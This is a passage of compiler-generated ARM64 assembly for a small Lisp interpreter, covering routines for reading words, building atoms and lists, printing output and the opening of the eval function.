x10, _pname@GOTPAGE ldr x10, [x10, _pname@GOTPAGEOFF] str x9, [x10, x11, lsl #3] ldr x10, [sp, #16] adrp x9, _pf_numb@GOTPAGE ldr x9, [x9, _pf_numb@GOTPAGEOFF] add x9, x9, x10, lsl #1 strh wzr, [x9] ldr x10, [sp, #16] adrp x9, _pf_args@GOTPAGE ldr x9, [x9, _pf_args@GOTPAGEOFF] add x9, x9, x10, lsl #1 strh wzr, [x9] ldr x10, [sp, #16] adrp x9, _vlst@GOTPAGE ldr x9, [x9, _vlst@GOTPAGEOFF] str x8, [x9, x10, lsl #3] ldr x0, [sp, #16] ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _mk_string ; -- Begin function mk_string .p2align 2 _mk_string: ; @mk_string .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 str x0, [sp, #8] str xzr, [sp] b LBB8_1 LBB8_1: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp, #8] ldrsb w8, [x8] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB8_3 b LBB8_2 LBB8_2: ; in Loop: Header=BB8_1 Depth=1 ldr x8, [sp, #8] add x9, x8, #1 str x9, [sp, #8] ldrsb x0, [x8] ldr x1, [sp] bl _cons str x0, [sp] b LBB8_1 LBB8_3: ldr x0, [sp] ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _out_lst ; -- Begin function out_lst .p2align 2 _out_lst: ; @out_lst .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, _atom@GOTPAGE ldr x8, [x8, _atom@GOTPAGEOFF] str x8, [sp] ; 8-byte Folded Spill str x0, [sp, #8] ldr x9, [sp, #8] adrp x8, _numb@GOTPAGE ldr x8, [x8, _numb@GOTPAGEOFF] ldrsh w8, [x8, x9, lsl #1] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB9_3 b LBB9_1 LBB9_1: ldr x9, [sp, #8] adrp x8, _pname@GOTPAGE ldr x8, [x8, _pname@GOTPAGEOFF] ldr x8, [x8, x9, lsl #3] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB9_3 b LBB9_2 LBB9_2: mov x0, #48 bl _out_chr b LBB9_11 LBB9_3: ldr x8, [sp] ; 8-byte Folded Reload ldr x9, [sp, #8] add x8, x8, x9, lsl #1 ldrh w8, [x8] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB9_5 b LBB9_4 LBB9_4: ldr x9, [sp, #8] adrp x8, _pname@GOTPAGE ldr x8, [x8, _pname@GOTPAGEOFF] ldr x0, [x8, x9, lsl #3] bl _out_atm b LBB9_11 LBB9_5: mov x0, #40 bl _out_chr b LBB9_6 LBB9_6: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp] ; 8-byte Folded Reload ldr x9, [sp, #8] add x8, x8, x9, lsl #1 ldrh w8, [x8] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB9_10 b LBB9_7 LBB9_7: ; in Loop: Header=BB9_6 Depth=1 ldr x9, [sp, #8] adrp x8, _car@GOTPAGE ldr x8, [x8, _car@GOTPAGEOFF] ldr x0, [x8, x9, lsl #3] bl _out_lst ldr x8, [sp] ; 8-byte Folded Reload ldr x10, [sp, #8] adrp x9, _cdr@GOTPAGE ldr x9, [x9, _cdr@GOTPAGEOFF] ldr x9, [x9, x10, lsl #3] str x9, [sp, #8] ldr x9, [sp, #8] add x8, x8, x9, lsl #1 ldrh w8, [x8] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB9_9 b LBB9_8 LBB9_8: ; in Loop: Header=BB9_6 Depth=1 mov x0, #32 bl _out_chr b LBB9_9 LBB9_9: ; in Loop: Header=BB9_6 Depth=1 b LBB9_6 LBB9_10: mov x0, #41 bl _out_chr b LBB9_11 LBB9_11: ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _out_chr ; -- Begin function out_chr .p2align 2 _out_chr: ; @out_chr .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 str x0, [sp, #8] adrp x10, _col@PAGE ldr x8, [x10, _col@PAGEOFF] add x9, x8, #1 str x9, [x10, _col@PAGEOFF] subs x8, x8, #50 cset w8, ne tbnz w8, #0, LBB10_2 b LBB10_1 LBB10_1: mov x9, sp adrp x8, l_.str.54@PAGE add x8, x8, l_.str.54@PAGEOFF str x8, [x9] adrp x0, l_.str.53@PAGE add x0, x0, l_.str.53@PAGEOFF bl _printf mov x8, #1 adrp x9, _col@PAGE str x8, [x9, _col@PAGEOFF] b LBB10_2 LBB10_2: ldr x8, [sp, #8] mov x0, x8 bl _putchar ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _out_atm ; -- Begin function out_atm .p2align 2 _out_atm: ; @out_atm .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 str x0, [sp, #8] ldr x8, [sp, #8] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB11_2 b LBB11_1 LBB11_1: b LBB11_3 LBB11_2: ldr x9, [sp, #8] adrp x8, _cdr@GOTPAGE ldr x8, [x8, _cdr@GOTPAGEOFF] ldr x0, [x8, x9, lsl #3] bl _out_atm ldr x9, [sp, #8] adrp x8, _car@GOTPAGE ldr x8, [x8, _car@GOTPAGEOFF] ldr x0, [x8, x9, lsl #3] bl _out_chr b LBB11_3 LBB11_3: ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _eq_wrd ; -- Begin function eq_wrd .p2align 2 _eq_wrd: ; @eq_wrd .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 str x0, [sp, #16] str x1, [sp, #8] ldr x8, [sp, #16] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB12_2 b LBB12_1 LBB12_1: ldr x8, [sp, #8] subs x8, x8, #0 cset w9, eq ; implicit-def: $x8 mov x8, x9 and x8, x8, #0x1 stur x8, [x29, #-8] b LBB12_7 LBB12_2: ldr x8, [sp, #8] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB12_4 b LBB12_3 LBB12_3: stur xzr, [x29, #-8] b LBB12_7 LBB12_4: ldr x8, [sp, #16] adrp x9, _car@GOTPAGE ldr x9, [x9, _car@GOTPAGEOFF] ldr x8, [x9, x8, lsl #3] ldr x10, [sp, #8] ldr x9, [x9, x10, lsl #3] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB12_6 b LBB12_5 LBB12_5: stur xzr, [x29, #-8] b LBB12_7 LBB12_6: ldr x9, [sp, #16] adrp x8, _cdr@GOTPAGE ldr x8, [x8, _cdr@GOTPAGEOFF] ldr x0, [x8, x9, lsl #3] ldr x9, [sp, #8] ldr x1, [x8, x9, lsl #3] bl _eq_wrd stur x0, [x29, #-8] b LBB12_7 LBB12_7: ldur x0, [x29, #-8] ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _lookup_word ; -- Begin function lookup_word .p2align 2 _lookup_word: ; @lookup_word .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 str x0, [sp, #16] adrp x8, _obj_lst@GOTPAGE ldr x8, [x8, _obj_lst@GOTPAGEOFF] ldr x8, [x8] str x8, [sp, #8] b LBB13_1 LBB13_1: ; =>This Inner Loop Header: Depth=1 ldr x9, [sp, #8] adrp x8, _atom@GOTPAGE ldr x8, [x8, _atom@GOTPAGEOFF] add x8, x8, x9, lsl #1 ldrh w8, [x8] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB13_5 b LBB13_2 LBB13_2: ; in Loop: Header=BB13_1 Depth=1 ldr x9, [sp, #8] adrp x8, _car@GOTPAGE ldr x8, [x8, _car@GOTPAGEOFF] ldr x9, [x8, x9, lsl #3] adrp x8, _pname@GOTPAGE ldr x8, [x8, _pname@GOTPAGEOFF] ldr x0, [x8, x9, lsl #3] ldr x1, [sp, #16] bl _eq_wrd subs x8, x0, #0 cset w8, eq tbnz w8, #0, LBB13_4 b LBB13_3 LBB13_3: ldr x9, [sp, #8] adrp x8, _car@GOTPAGE ldr x8, [x8, _car@GOTPAGEOFF] ldr x8, [x8, x9, lsl #3] stur x8, [x29, #-8] b LBB13_6 LBB13_4: ; in Loop: Header=BB13_1 Depth=1 ldr x9, [sp, #8] adrp x8, _cdr@GOTPAGE ldr x8, [x8, _cdr@GOTPAGEOFF] ldr x8, [x8, x9, lsl #3] str x8, [sp, #8] b LBB13_1 LBB13_5: mov x2, #0 mov x0, x2 adrp x1, l_.str.55@PAGE add x1, x1, l_.str.55@PAGEOFF bl _mk_atom str x0, [sp, #8] ldr x8, [sp, #16] ldr x10, [sp, #8] adrp x9, _pname@GOTPAGE ldr x9, [x9, _pname@GOTPAGEOFF] str x8, [x9, x10, lsl #3] ldr x8, [sp, #8] stur x8, [x29, #-8] b LBB13_6 LBB13_6: ldur x0, [x29, #-8] ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _in_word2 ; -- Begin function in_word2 .p2align 2 _in_word2: ; @in_word2 .cfi_startproc ; %bb.0: sub sp, sp, #80 .cfi_def_cfa_offset 80 stp x29, x30, [sp, #64] ; 16-byte Folded Spill add x29, sp, #64 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, _cdr@GOTPAGE ldr x8, [x8, _cdr@GOTPAGEOFF] str x8, [sp, #16] ; 8-byte Folded Spill b LBB14_1 LBB14_1: ; =>This Loop Header: Depth=1 ; Child Loop BB14_3 Depth 2 ; Child Loop BB14_8 Depth 2 adrp x8, _in_word2.buffer@PAGE ldr x8, [x8, _in_word2.buffer@PAGEOFF] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB14_29 b LBB14_2 LBB14_2: ; in Loop: Header=BB14_1 Depth=1 mov x1, #0 mov x0, x1 bl _cons str x0, [sp, #32] stur x0, [x29, #-24] b LBB14_3 LBB14_3: ; Parent Loop BB14_1 Depth=1 ; => This Inner Loop Header: Depth=2 bl _getchar ; implicit-def: $x8 mov x8, x0 sxtw x8, w8 stur x8, [x29, #-8] ldur x8, [x29, #-8] adds x8, x8, #1 cset w8, ne tbnz w8, #0, LBB14_5 b LBB14_4 LBB14_4: mov x0, #0 bl _time adrp x8, _time2@GOTPAGE ldr x8, [x8, _time2@GOTPAGEOFF] str x0, [x8] ldr x0, [x8] adrp x8, _time1@GOTPAGE ldr x8, [x8, _time1@GOTPAGEOFF] ldr x1, [x8] bl _difftime mov x8, sp str d0, [x8] adrp x0, l_.str.56@PAGE add x0, x0, l_.str.56@PAGEOFF bl _printf mov w0, #0 bl _exit LBB14_5: ; in Loop: Header=BB14_3 Depth=2 ldur x8, [x29, #-8] mov x0, x8 bl _putchar ldur x0, [x29, #-8] mov x1, #0 bl _cons ldr x8, [sp, #16] ; 8-byte Folded Reload ldr x9, [sp, #32] str x0, [x8, x9, lsl #3] str x0, [sp, #32] b LBB14_6 LBB14_6: ; in Loop: Header=BB14_3 Depth=2 ldur x8, [x29, #-8] subs x8, x8, #10 cset w8, ne tbnz w8, #0, LBB14_3 b LBB14_7 LBB14_7: ; in Loop: Header=BB14_1 Depth=1 ldr x8, [sp, #16] ; 8-byte Folded Reload ldur x9, [x29, #-24] ldr x8, [x8, x9, lsl #3] stur x8, [x29, #-24] mov x1, #0 mov x0, x1 bl _cons str x0, [sp, #24] adrp x8, _in_word2.buffer@PAGE str x0, [x8, _in_word2.buffer@PAGEOFF] stur xzr, [x29, #-16] b LBB14_8 LBB14_8: ; Parent Loop BB14_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldur x8, [x29, #-24] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB14_28 b LBB14_9 LBB14_9: ; in Loop: Header=BB14_8 Depth=2 ldr x8, [sp, #16] ; 8-byte Folded Reload ldur x10, [x29, #-24] adrp x9, _car@GOTPAGE ldr x9, [x9, _car@GOTPAGEOFF] ldr x9, [x9, x10, lsl #3] stur x9, [x29, #-8] ldur x9, [x29, #-24] ldr x8, [x8, x9, lsl #3] stur x8, [x29, #-24] ldur x8, [x29, #-8] subs x8, x8, #32 cset w8, eq tbnz w8, #0, LBB14_17 b LBB14_10 LBB14_10: ; in Loop: Header=BB14_8 Depth=2 ldur x8, [x29, #-8] subs x8, x8, #10 cset w8, eq tbnz w8, #0, LBB14_17 b LBB14_11 LBB14_11: ; in Loop: Header=BB14_8 Depth=2 ldur x8, [x29, #-8] subs x8, x8, #40 cset w8, eq tbnz w8, #0, LBB14_17 b LBB14_12 LBB14_12: ; in Loop: Header=BB14_8 Depth=2 ldur x8, [x29, #-8] subs x8, x8, #41 cset w8, eq tbnz w8, #0, LBB14_17 b LBB14_13 LBB14_13: ; in Loop: Header=BB14_8 Depth=2 ldur x8, [x29, #-8] subs x8, x8, #91 cset w8, eq tbnz w8, #0, LBB14_17 b LBB14_14 LBB14_14: ; in Loop: Header=BB14_8 Depth=2 ldur x8, [x29, #-8] subs x8, x8, #93 cset w8, eq tbnz w8, #0, LBB14_17 b LBB14_15 LBB14_15: ; in Loop: Header=BB14_8 Depth=2 ldur x8, [x29, #-8] subs x8, x8, #39 cset w8, eq tbnz w8, #0, LBB14_17 b LBB14_16 LBB14_16: ; in Loop: Header=BB14_8 Depth=2 ldur x8, [x29, #-8] subs x8, x8, #34 cset w8, ne tbnz w8, #0, LBB14_23 b LBB14_17 LBB14_17: ; in Loop: Header=BB14_8 Depth=2 ldur x8, [x29, #-16] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB14_19 b LBB14_18 LBB14_18: ; in Loop: Header=BB14_8 Depth=2 ldur x0, [x29, #-16] mov x1, #0 bl _cons ldr x8, [sp, #16] ; 8-byte Folded Reload ldr x9, [sp, #24] str x0, [x8, x9, lsl #3] str x0, [sp, #24] b LBB14_19 LBB14_19: ; in Loop: Header=BB14_8 Depth=2 stur xzr, [x29, #-16] ldur x8, [x29, #-8] subs x8, x8, #32 cset w8, eq tbnz w8, #0, LBB14_22 b LBB14_20 LBB14_20: ; in Loop: Header=BB14_8 Depth=2 ldur x8, [x29, #-8] subs x8, x8, #10 cset w8, eq tbnz w8, #0, LBB14_22 b LBB14_21 LBB14_21: ; in Loop: Header=BB14_8 Depth=2 ldur x0, [x29, #-8] mov x1, #0 str x1, [sp, #8] ; 8-byte Folded Spill bl _cons ldr x1, [sp, #8] ; 8-byte Folded Reload bl _cons ldr x8, [sp, #16] ; 8-byte Folded Reload ldr x9, [sp, #24] str x0, [x8, x9, lsl #3] str x0, [sp, #24] b LBB14_22 LBB14_22: ; in Loop: Header=BB14_8 Depth=2 b LBB14_27 LBB14_23: ; in Loop: Header=BB14_8 Depth=2 ldur x9, [x29, #-8] mov x8, #32 subs x8, x8, x9 cset w8, ge tbnz w8, #0, LBB14_26 b LBB14_24 LBB14_24: ; in Loop: Header=BB14_8 Depth=2 ldur x8, [x29, #-8] subs x8, x8, #127 cset w8, ge tbnz w8, #0, LBB14_26 b LBB14_25 LBB14_25: ; in Loop: Header=BB14_8 Depth=2 ldur x0, [x29, #-8] ldur x1, [x29, #-16] bl _cons stur x0, [x29, #-16] b LBB14_26 LBB14_26: ; in Loop: Header=BB14_8 Depth=2 b LBB14_27 LBB14_27: ; in Loop: Header=BB14_8 Depth=2 b LBB14_8 LBB14_28: ; in Loop: Header=BB14_1 Depth=1 ldr x8, [sp, #16] ; 8-byte Folded Reload adrp x9, _in_word2.buffer@PAGE ldr x10, [x9, _in_word2.buffer@PAGEOFF] ldr x8, [x8, x10, lsl #3] str x8, [x9, _in_word2.buffer@PAGEOFF] b LBB14_1 LBB14_29: ldr x8, [sp, #16] ; 8-byte Folded Reload adrp x9, _in_word2.buffer@PAGE ldr x11, [x9, _in_word2.buffer@PAGEOFF] adrp x10, _car@GOTPAGE ldr x10, [x10, _car@GOTPAGEOFF] ldr x10, [x10, x11, lsl #3] stur x10, [x29, #-16] ldr x10, [x9, _in_word2.buffer@PAGEOFF] ldr x8, [x8, x10, lsl #3] str x8, [x9, _in_word2.buffer@PAGEOFF] ldur x0, [x29, #-16] bl _only_digits subs x8, x0, #0 cset w8, eq tbnz w8, #0, LBB14_31 b LBB14_30 LBB14_30: ldur x0, [x29, #-16] bl _remove_leading_zeros bl _mk_numb stur x0, [x29, #-16] b LBB14_32 LBB14_31: ldur x0, [x29, #-16] bl _lookup_word stur x0, [x29, #-16] b LBB14_32 LBB14_32: ldur x0, [x29, #-16] ldp x29, x30, [sp, #64] ; 16-byte Folded Reload add sp, sp, #80 ret .cfi_endproc ; -- End function .globl _only_digits ; -- Begin function only_digits .p2align 2 _only_digits: ; @only_digits .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 str x0, [sp, #16] b LBB15_1 LBB15_1: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp, #16] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB15_6 b LBB15_2 LBB15_2: ; in Loop: Header=BB15_1 Depth=1 ldr x9, [sp, #16] adrp x8, _car@GOTPAGE ldr x8, [x8, _car@GOTPAGEOFF] ldr x8, [x8, x9, lsl #3] str x8, [sp, #8] ldr x8, [sp, #8] subs x8, x8, #48 cset w8, lt tbnz w8, #0, LBB15_4 b LBB15_3 LBB15_3: ; in Loop: Header=BB15_1 Depth=1 ldr x8, [sp, #8] subs x8, x8, #57 cset w8, le tbnz w8, #0, LBB15_5 b LBB15_4 LBB15_4: str xzr, [sp, #24] b LBB15_7 LBB15_5: ; in Loop: Header=BB15_1 Depth=1 ldr x9, [sp, #16] adrp x8, _cdr@GOTPAGE ldr x8, [x8, _cdr@GOTPAGEOFF] ldr x8, [x8, x9, lsl #3] str x8, [sp, #16] b LBB15_1 LBB15_6: mov x8, #1 str x8, [sp, #24] b LBB15_7 LBB15_7: ldr x0, [sp, #24] add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _remove_leading_zeros ; -- Begin function remove_leading_zeros .p2align 2 _remove_leading_zeros: ; @remove_leading_zeros .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 str x0, [sp, #16] ldr x8, [sp, #16] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB16_2 b LBB16_1 LBB16_1: stur xzr, [x29, #-8] b LBB16_6 LBB16_2: ldr x9, [sp, #16] adrp x8, _car@GOTPAGE ldr x8, [x8, _car@GOTPAGEOFF] ldr x8, [x8, x9, lsl #3] str x8, [sp] ldr x9, [sp, #16] adrp x8, _cdr@GOTPAGE ldr x8, [x8, _cdr@GOTPAGEOFF] ldr x0, [x8, x9, lsl #3] bl _remove_leading_zeros str x0, [sp, #8] ldr x8, [sp, #8] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB16_5 b LBB16_3 LBB16_3: ldr x8, [sp] subs x8, x8, #48 cset w8, ne tbnz w8, #0, LBB16_5 b LBB16_4 LBB16_4: stur xzr, [x29, #-8] b LBB16_6 LBB16_5: ldr x0, [sp] ldr x1, [sp, #8] bl _cons stur x0, [x29, #-8] b LBB16_6 LBB16_6: ldur x0, [x29, #-8] ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _in_word ; -- Begin function in_word .p2align 2 _in_word: ; @in_word .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 b LBB17_1 LBB17_1: ; =>This Loop Header: Depth=1 ; Child Loop BB17_4 Depth 2 bl _in_word2 str x0, [sp, #8] ldr x8, [sp, #8] adrp x9, _left_bracket@GOTPAGE ldr x9, [x9, _left_bracket@GOTPAGEOFF] ldr x9, [x9] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB17_3 b LBB17_2 LBB17_2: ldr x0, [sp, #8] ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret LBB17_3: ; in Loop: Header=BB17_1 Depth=1 b LBB17_4 LBB17_4: ; Parent Loop BB17_1 Depth=1 ; => This Inner Loop Header: Depth=2 bl _in_word adrp x8, _right_bracket@GOTPAGE ldr x8, [x8, _right_bracket@GOTPAGEOFF] ldr x8, [x8] subs x8, x0, x8 cset w8, eq tbnz w8, #0, LBB17_6 b LBB17_5 LBB17_5: ; in Loop: Header=BB17_4 Depth=2 b LBB17_4 LBB17_6: ; in Loop: Header=BB17_1 Depth=1 b LBB17_1 .cfi_endproc ; -- End function .globl _eval ; -- Begin function eval .p2align 2 _eval: ; @eval .cfi_startproc ; %bb.0: sub sp, sp, #448 .cfi_def_cfa_offset 448 stp x28, x27, [sp, #416] ; 16-byte Folded Spill stp x29, x30, [sp, #432] ; 16-byte Folded Spill add x29, sp, #432 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 .cfi_offset w27, -24 .cfi_offset w28, -32 adrp x8, _atom@GOTPAGE ldr x8, [x8, _atom@GOTPAGEOFF] str x8, [sp, #200] ; 8-byte Folded Spill adrp x8, _car@GOTPAGE ldr x8, [x8, _car@GOTPAGEOFF] str x8, [sp, #208] ; 8-byte Folded Spill adrp x8, _cdr@GOTPAGE ldr x8, [x8, _cdr@GOTPAGEOFF] str x8, [sp, #216] ; 8-byte Folded Spill adrp x8, _wrd_false@GOTPAGE ldr x8, [x8, _wrd_false@GOTPAGEOFF] stur x8, [x29, #-208] ; 8-byte Folded Spill adrp x8, _wrd_true@GOTPAGE ldr x8, [x8, _wrd_true@GOTPAGEOFF] stur x8, [x29, #-200] ; 8-byte Folded Spill adrp x8, _display_enabled@GOTPAGE ldr x8, [x8, _display_enabled@GOTPAGEOFF] stur x8, [x29, #-192] ; 8-byte Folded Spill adrp x8, _captured_displays@GOTPAGE ldr x8, [x8, _captured_displays@GOTPAGEOFF] stur x8, [x29, #-184] ; 8-byte Folded Spill adrp x8, _wrd_no_time_limit@GOTPAGE ldr x8, [x8, _wrd_no_time_limit@GOTPAGEOFF] stur x8, [x29, #-176] ; 8-byte Folded Spill adrp x8, _vlst@GOTPAGE ldr x8, [x8, _vlst@GOTPAGEOFF] stur x8, [x29, #-168] ; 8-byte Folded Spill adrp x8, _turing_machine_tapes@GOTPAGE ldr x8, [x8, _turing_machine_tapes@GOTPAGEOFF] stur x8, [x29, #-160] ; 8-byte Folded Spill stur x0, [x29, #-32] stur x1, [x29, #-40] ldur x9, [x29, #-32] adrp x8, _numb@GOTPAGE ldr x8, [x8, _numb@GOTPAGEOFF] add x8, x8, x9, lsl #1 ldrh w8, [x8] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB18_2 b LBB18_1 LBB18_1: ldur x8, [x29, #-32] stur x8, [x29, #-24] b LBB18_96 LBB18_2: ldr x8, [sp, #200] ; 8-byte Folded Reload ldur x9, [x29, #-32] add x8, x8, x9, lsl #1 ldrh w8, [x8] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB18_4 b LBB18_3 LBB18_3: ldr x8, [sp, #208] ; 8-byte Folded Reload ldur x9, [x29, #-168] ; 8-byte Folded Reload ldur x10, [x29, #-32] ldr x9, [x9, x10, lsl #3] ldr x8, [x8, x9, lsl #3] stur x8, [x29, #-24] b LBB18_96 LBB18_4: ldr x8, [sp, #208] ; 8-byte Folded Reload ldur x9, [x29, #-32] ldr x0, [x8, x9, lsl #3] ldur x1, [x29, #-40] bl _eval ldr x8, [sp, #216] ; 8-byte Folded Reload stur x0, [x29, #-48] ldur x9, [x29, #-32] ldr x8, [x8, x9, lsl #3] stur x8, [x29, #-32] ldur x8, [x29, #-48] subs x8, x8, #0 cset w8, ge tbnz w8, #0, LBB18_6 b LBB18_5 LBB18_5: ldur x8, [x29, #-48] stur x8, [x29, #-24] b LBB18_96 LBB18_6: ldur x8, [x29, #-48] adrp x9, _wrd_quote@GOTPAGE ldr x9, [x9, _wrd_quote@GOTPAGEOFF] ldr x9, [x9] subs x8, x8, x9 cset w8, ne tbnz w8, #0, LBB18_8 b LBB18_7 LBB18_7: ldr x8, [sp, #208] ; 8-byte Folded Reload ldur x9, [x29, #-32] ldr x8, [x8, x9, lsl #3] stur x8, [x29, #-24] b LBB18_96 LBB18_8: ldur x8, [x29, #-48] adrp x9, _wrd_if@GOTPAGE ldr x9, [x9, _wrd_if@GOTPAGEOFF] ldr x9, [x9] subs x8, x8, x9 cset w8, ne tbnz w8, #0, LBB18_14 b LBB18_9 LBB18_9: ldr x8, [sp, #208] ; 8-byte Folded Reload ldur x9, [x29, #-32] ldr x0, [x8, x9, lsl #3] ldur x1, [x29, #-40] bl _eval ldr x8, [sp, #216] ; 8-byte Folded Reload stur x0, [x29, #-56] ldur x9, [x29, #-32] ldr x8, [x8, x9, lsl #3] stur x8, [x29, #-32] ldur x8, [x29, #-56] subs x8, x8, #0 cset w8, ge tbnz w8, #0, LBB18_11 b LBB18_10 LBB18_10: ldur x8, [x29, #-56] stur x8, [x29, #-24] b LBB18_96 LBB18_11: ldur x9, [x29, #-208] ; 8-byte Folded Reload ldur x8, [x29, #-56] ldr x9, [x9] subs x8, x8, x9 cset w8, ne tbnz w8, #0, LBB18_13 b LBB18_12 LBB18_12: ldr x8, [sp, #216] ; 8-byte Folded Reload ldur x9, [x29, #-32] ldr x8, [x8, x9, lsl #3] stur x8, [x29, #-32] b LBB18_13 LBB18_13: ldr x8, [sp, #208] ; 8-byte Folded Reload ldur x9, [x29, #-32] ldr x0, [x8, x9, lsl #3] ldur x1, [x29, #-40] bl _eval stur x0, [x29, #-24] b LBB18_96 LBB18_14: ldur x0, [x29, #-32] ldur x1, [x29, #-40] bl _evalst stur x0, [x29, #-64] ldur x8, [x29, #-64] subs x8, x8, #0 cset w8, ge tbnz w8, #0, LBB18_16 b LBB18_15 LBB18_15: ldur x8, [x29, #-64] stur x8, [x29, #-24] b LBB18_96 LBB18_16: ldr x8, [sp, #208] ; 8-byte Folded Reload ldr x9, [sp, #216] ; 8-byte Folded Reload ldur x10, [x29, #-64] ldr x10, [x8, x10, lsl #3] stur x10, [x29, #-72] ldur x10, [x29, #-64] ldr x10, [x9, x10, lsl #3] ldr x10, [x8, x10, lsl #3] stur x10, [x29, #-80] ldur x10, [x29, #-64] ldr x10, [x9, x10, lsl #3] ldr x9, [x9, x10, lsl #3] ldr x8, [x8, x9, lsl #3] stur x8, [x29, #-88] ldur x9, [x29, #-48] adrp x8, _pf_numb@GOTPAGE ldr x8, [x8, _pf_numb@GOTPAGEOFF] ldrsh w8, [x8, x9, lsl #1] subs w8, w8, #1 ; kill: def $x8 killed $w8 str x8, [sp, #192] ; 8-byte Folded Spill subs x8, x8, #22 cset w8, hi tbnz w8, #0, LBB18_71 ; %bb.17: ldr x11, [sp, #192] ; 8-byte Folded Reload adrp x10, lJTI18_0@PAGE add x10, x10, lJTI18_0@PAGEOFF Ltmp1: adr x8, Ltmp1 ldrsw x9, [x10, x11, lsl #2] add x8, x8, x9 br x8 LBB18_18: ldr x8, [sp, #208] ; 8-byte Folded Reload ldur x9, [x29, #-72] ldr x8, [x8, x9, lsl #3] stur x8, [x29, #-24] b LBB18_96 LBB18_19: ldr x8, [sp, #216] ; 8-byte Folded Reload ldur x9, [x29, #-72] ldr x8, [x8, x9, lsl #3] stur x8, [x29, #-24] b LBB18_96 LBB18_20: ldur x0, [x29, #-72] ldur x1, [x29, #-80] bl _cons stur x0, [x29, #-24] b LBB18_96 LBB18_21: ldr x8, [sp, #200] ; 8-byte Folded Reload ldur x9, [x29, #-72] ldrsh w8, [x8, x9, lsl #1] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB18_23 b LBB18_22 LBB18_22: ldur x8, [x29, #-200] ; 8-byte Folded Reload ldr x8, [x8] str x8, [sp, #184] ; 8-byte Folded Spill b LBB18_24 LBB18_23: ldur x8, [x29, #-208] ; 8-byte Folded Reload ldr x8, [x8] str x8, [sp, #184] ; 8-byte Folded Spill b LBB18_24 LBB18_24: ldr x8, [sp, #184] ; 8-byte Folded Reload stur x8, [x29, #-24] b LBB18_96 LBB18_25: ldur x0, [x29, #-72] ldur x1, [x29, #-80] bl _eq subs x8, x0, #0 cset w8, eq tbnz w8, #0, LBB18_27 b LBB18_26 LBB18_26: ldur x8, [x29, 